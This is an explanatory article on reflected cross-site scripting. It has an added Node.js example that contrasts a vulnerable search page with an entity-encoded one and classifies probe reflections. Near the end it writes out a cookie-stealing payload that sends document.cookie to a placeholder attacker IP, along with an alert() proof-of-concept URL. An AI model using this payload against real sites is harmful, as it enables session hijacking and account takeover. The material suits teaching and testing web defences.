Cross-Site Scripting (XSS) is a client-side attack in which an attacker injects malicious JavaScript into a web application so that it executes in another user’s browser, within the origin of the vulnerable site. A common goal of Cross-Site Scripting is to make the victim’s browser send a request to a server controlled by the attacker. This may be used to retrieve session tokens and achieve session hijacking, or to trigger a drive-by download.
Reflected Cross-Site Scripting occurs when data a user supplies in an HTTP request is echoed back in the HTTP response without adequate encoding. It is most common in HTTP GET parameters, but that does not mean POST requests should be ignored. A typical example is a search box, where the application produces a page with a title of “Search Results for: <user data>”.
Any data a user provides to an application that is reflected back is a potential attack vector for Reflected Cross-Site Scripting. Nearly all Cross-Site Scripting opportunities arise because the application inserts user input into the response without encoding it for the context it lands in (HTML text, an attribute value, a script block), so the input can dictate which HTML tags and scripts the browser will process.
If an attacker identifies a parameter that is reflected to the browser they may try to trigger a Cross-Site Scripting payload as shown below:
www.northgreensecurity-insecuresite.com/search?s=xss
A web application that renders “Results for xss” in the response would be worth investigating.
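The following is an added example, not code from the original article or from the site it names. It simulates the search page described above in Node.js: a vulnerable renderer that interpolates the s parameter straight into the HTML (the situation described in the paragraph on user input dictating HTML tags), a hardened renderer that entity-encodes it, and a probe check that tells the two apart from the response body, which is the “worth investigating” step above made mechanical. The function names, the probe string and the sample responses are assumptions made for illustration.

```javascript
// Added example (not the article's own code). Simulates the reflected search
// page from the text and shows how to classify what comes back from a probe.

// Entity-encode the five characters that matter in HTML text and
// double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the query parameter dictates the HTML of the response.
function renderSearchVulnerable(s) {
  return `<html><body><h1>Results for ${s}</h1></body></html>`;
}

// Hardened: the same page, with the parameter encoded for the HTML text
// context it is inserted into.
function renderSearchSafe(s) {
  return `<html><body><h1>Results for ${escapeHtml(s)}</h1></body></html>`;
}

// Probe value (constructed): a unique marker followed by the characters that
// HTML encoding must neutralise. The marker makes the reflection easy to find
// even when the special characters are stripped.
const PROBE = 'zq7xss"<>\'';

// Classify how the probe came back in a response body:
//   'raw'      reflected verbatim, so the HTML context is injectable
//   'encoded'  entity-encoded, so it is inert in an HTML text context
//   'filtered' marker present but the special characters were altered
//   'none'     not reflected at all
function reflectionContext(body, probe = PROBE) {
  if (body.includes(probe)) return 'raw';
  if (body.includes(escapeHtml(probe))) return 'encoded';
  const marker = probe.replace(/[^A-Za-z0-9]/g, '');
  if (body.includes(marker)) return 'filtered';
  return 'none';
}

// Build the PoC link a tester would send. The payload is percent-encoded so
// the URL survives copy/paste and proxies; the browser decodes it before the
// application sees it.
function pocUrl(base, payload) {
  return `${base}/search?s=${encodeURIComponent(payload)}`;
}

// Walk the article's steps against both renderers: probe, then check whether
// the alert payload would reach the browser untouched.
function demo() {
  const renderers = [['vulnerable', renderSearchVulnerable], ['safe', renderSearchSafe]];
  const results = {};
  for (const [name, render] of renderers) {
    results[name] = {
      context: reflectionContext(render(PROBE)),
      popsAlert: render('<script>alert(1)</script>').includes('<script>alert(1)</script>'),
    };
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
  console.log(pocUrl('http://www.northgreensecurity-insecuresite.com', '<script>alert(1)</script>'));
}
```

The probe deliberately contains both quote characters and angle brackets: a response that returns the marker but with those characters encoded or stripped tells you the HTML text context is not directly injectable, while a raw reflection means the alert PoC will fire. In a real test the same classification should be repeated for every parameter and for both GET and POST submissions.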
A simple PoC typically aims to trigger an alert box by using a payload such as <script>alert(1)</script>:
www.northgreensecurity-insecuresite.com/search?s=<script>alert(1)</script>
Should a potential victim follow this link, their browser would load the page on northgreensecurity-insecuresite.com and a pop-up box would appear containing the text 1. While an alert box is not itself malicious, it is a good visual PoC. A more malicious attack may attempt to steal the user’s session cookie, which would allow the attacker to impersonate the user and gain access to their account. This could be achieved with a payload such as:
<script>document.write('<img src="http://<Attackers IP>/?c=' + encodeURIComponent(document.cookie) + '" />');</script>
The browser fetches the image from the attacker’s host and, in doing so, delivers the cookie string in the query string of the request, where it can be read from the attacker’s web server logs. Two caveats apply: encodeURIComponent is needed because cookie strings contain characters such as ; and = that would otherwise break the URL, and document.cookie cannot read cookies flagged HttpOnly, so a session cookie set with that flag is not exposed by this payload (the injected script can still act on the user’s behalf from within the page, but it cannot exfiltrate the cookie value).